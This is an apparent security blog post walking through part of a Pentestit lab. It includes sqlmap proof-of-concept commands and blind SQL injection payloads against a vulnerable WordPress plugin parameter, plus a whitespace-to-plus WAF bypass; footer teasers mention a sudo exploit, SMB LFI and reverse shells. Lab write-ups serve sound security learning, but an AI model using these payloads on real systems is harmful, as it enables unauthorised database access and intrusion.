Innogen security

RECENT BLOG

Posted in Blog post

Pentestit lab v11 Guide Part 2

 

SITE Attempt one – 192.168.101.10:80

Obviously the first thing we do is view the source page for useful links, comments and any mistakes a dev may have made.

Also we can test basic sqli via the search box on the main web page, however this proved fruitless so concentration went back to the underlying source code.

On viewing the source for the SITE server we find a wordpress path to a plugin named ‘kittycatfish-2.2’

<link rel='stylesheet' id='kittycatfish-base-css'  href='http://192.168.101.10/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&#038;' type='text/css' media='all' />
<link rel='stylesheet' id='twentyseventeen-fonts-css'  href='https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&#038;subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='twentyseventeen-style-css'  href='http://192.168.101.10/wp-content/themes/twentyseventeen/style.css' type='text/css' media='all' />
<!--[if lt IE 9]>

A run of wpscan against the site returned nothing of worth and as I had not come across this plugin before I decided to run it through searchsploit on the off chance there was existing vulnerabilities which proved to be true:

Vulnerable Parameter:
From reading the exploit it clearly states the vulnerability resides with the following parameter:

The get parameter ‘kc_ad’ is vulnerable.

Now more reading of the exploit shows an sqlmap command so naturally i modify the provided poc in the exploit:

 

2. Proof of concept

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&""  —dbms —threads=10 —random-agent

OR

sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/kittycatfish.php?kc_ad=37&ver=2.0" —dbms —threads=10 —random-agent —dbms=mysql   —level 5 —risk=3

Parameter: kc_ad (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: kc_ad=31 AND 2281=2281&ver=2.0

 

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

    Payload: kc_ad=31 AND (SELECT * FROM (SELECT(SLEEP(5)))xzZh)&ver=2.0

The basic sqlmap query failed to return results even with ammending tamper scripts, risk levels and adding timings plus –hex to the params.
Based on this i manually manipulated the url and found how this functions:

Initial CSS Page:

 

Adding our injection char into the kc_ad parameter:

Adding basic injection characters reports a 403 forbidden error so further testing shows replacing the whitespace with a plus character resolves the issue and shows us our injection point:

 

However my manual and sqlmap based attempts all failed so a rather aggressive WAF appears to be running in front of the SITE server and i decided to save off the information and come back at this server from the inside, providing i can gain a foothold….

I therefore decided to attack the Vtiger CRM system as i figured if we can gain admin access to a CRM platform we can potentially gain a foothold into the server via a webshell or other injection mechanism…

Part 3:

 

Innogen security

RECENT BLOG

Exploiting Sudo 1.8.27 The following brief is a quick demonstration of the issue faced by cve-2019-14287. This issue is presented when the user is allowed to run a specified command as any user other than the root user account, specified …

17 Oct 2019

SMB LFI Exploitation The following outlines a very short overview of LFI using SMB in form of a crib sheet. Install Samba: apt-get install samba Remove default Samba config: rm -f /etc/samba/smb.conf Create New smb.conf: vi /etc/samba/smb.conf The following config …

13 Oct 2019

Linux reverse shell without python. During a recent application exploit into an interactive shell the typical path to spawn a reverse shell and upgrade it to tty was sought. It was found that the go to technologies such as python, …

19 Sep 2019